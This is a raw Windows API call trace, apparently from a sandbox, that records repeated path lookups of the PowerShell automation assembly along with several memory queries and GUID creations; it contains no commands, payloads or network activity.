	[0161.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.873] GetLastError () returned 0x0
	[0161.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.873] GetLastError () returned 0x0
	[0161.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.873] GetLastError () returned 0x0
	[0161.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.873] GetLastError () returned 0x0
	[0161.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.873] GetLastError () returned 0x0
	[0161.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.874] GetLastError () returned 0x0
	[0161.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.874] GetLastError () returned 0x0
	[0161.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.874] GetLastError () returned 0x0
	[0161.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.874] GetLastError () returned 0x0
	[0161.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.874] GetLastError () returned 0x0
	[0161.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.874] GetLastError () returned 0x0
	[0161.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.874] GetLastError () returned 0x0
	[0161.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.874] GetLastError () returned 0x0
	[0161.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.875] GetLastError () returned 0x0
	[0161.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.875] GetLastError () returned 0x0
	[0161.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.875] GetLastError () returned 0x0
	[0161.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.875] GetLastError () returned 0x0
	[0161.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.875] GetLastError () returned 0x0
	[0161.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.875] GetLastError () returned 0x0
	[0161.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.875] GetLastError () returned 0x0
	[0161.875] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.876] GetLastError () returned 0x0
	[0161.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.876] GetLastError () returned 0x0
	[0161.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.876] GetLastError () returned 0x0
	[0161.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.876] GetLastError () returned 0x0
	[0161.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.876] GetLastError () returned 0x0
	[0161.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.876] GetLastError () returned 0x0
	[0161.876] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.876] GetLastError () returned 0x0
	[0161.876] VirtualQuery (in: lpAddress=0x14cc94, lpBuffer=0x14dc94, dwLength=0x1c | out: lpBuffer=0x14dc94*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.877] VirtualQuery (in: lpAddress=0x14ccd0, lpBuffer=0x14dcd0, dwLength=0x1c | out: lpBuffer=0x14dcd0*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.877] GetLastError () returned 0x0
	[0161.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.877] GetLastError () returned 0x0
	[0161.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.877] GetLastError () returned 0x0
	[0161.878] VirtualQuery (in: lpAddress=0x14cd9c, lpBuffer=0x14dd9c, dwLength=0x1c | out: lpBuffer=0x14dd9c*(BaseAddress=0x14c000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0161.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.878] GetLastError () returned 0x0
	[0161.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.878] GetLastError () returned 0x0
	[0161.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14da34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.878] GetLastError () returned 0x0
	[0161.878] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x7f0c2860, Data2=0x8be5, Data3=0x43f3, Data4=([0]=0x85, [1]=0x4a, [2]=0xaa, [3]=0xf1, [4]=0x36, [5]=0x60, [6]=0xec, [7]=0x9d))) returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.879] GetLastError () returned 0x0
	[0161.880] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x11d5ea34, Data2=0xf1f0, Data3=0x4c85, Data4=([0]=0x9b, [1]=0x84, [2]=0xf1, [3]=0x7c, [4]=0x53, [5]=0x80, [6]=0x77, [7]=0xfa))) returned 0x0
	[0161.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.880] GetLastError () returned 0x0
	[0161.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.880] GetLastError () returned 0x0
	[0161.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.880] GetLastError () returned 0x0
	[0161.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.880] GetLastError () returned 0x0
	[0161.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.881] GetLastError () returned 0x0
	[0161.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.881] GetLastError () returned 0x0
	[0161.881] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x46d19b65, Data2=0x4c5d, Data3=0x4fde, Data4=([0]=0xa8, [1]=0xb6, [2]=0x1c, [3]=0xc7, [4]=0xcd, [5]=0xaf, [6]=0x50, [7]=0xd8))) returned 0x0
	[0161.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.881] GetLastError () returned 0x0
	[0161.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.881] GetLastError () returned 0x0
	[0161.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.881] GetLastError () returned 0x0
	[0161.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.881] GetLastError () returned 0x0
	[0161.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.882] GetLastError () returned 0x0
	[0161.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14dba0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0161.882] GetLastError () returned 0x0
	[0162.117] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xcc65adfa, Data2=0x19a4, Data3=0x4046, Data4=([0]=0x84, [1]=0x2f, [2]=0xad, [3]=0x6e, [4]=0x15, [5]=0x72, [6]=0x6d, [7]=0xfc))) returned 0x0
	[0162.118] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xbc5fed9c, Data2=0xc68e, Data3=0x4f48, Data4=([0]=0x83, [1]=0xcb, [2]=0xa1, [3]=0x4f, [4]=0x3b, [5]=0x37, [6]=0x28, [7]=0x8e))) returned 0x0
	[0162.118] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x5d13317a, Data2=0x533c, Data3=0x4936, Data4=([0]=0x99, [1]=0x7f, [2]=0xf8, [3]=0xcc, [4]=0xe6, [5]=0x25, [6]=0x19, [7]=0x8e))) returned 0x0
	[0162.118] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xad44bcca, Data2=0xc872, Data3=0x45db, Data4=([0]=0x9e, [1]=0x9, [2]=0xed, [3]=0x10, [4]=0x96, [5]=0x7b, [6]=0xb9, [7]=0x73))) returned 0x0
	[0162.119] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0xa89bd127, Data2=0x207b, Data3=0x4748, Data4=([0]=0xa6, [1]=0x28, [2]=0xba, [3]=0xe, [4]=0x4f, [5]=0xaa, [6]=0x8f, [7]=0xfe))) returned 0x0
	[0162.125] CoCreateGuid (in: pguid=0x14e348 | out: pguid=0x14e348*(Data1=0x963381e0, Data2=0xb26d, Data3=0x4c31, Data4=([0]=0xb4, [1]=0x83, [2]=0x14, [3]=0xc3, [4]=0x5c, [5]=0x84, [6]=0x51, [7]=0xa3))) returned 0x0
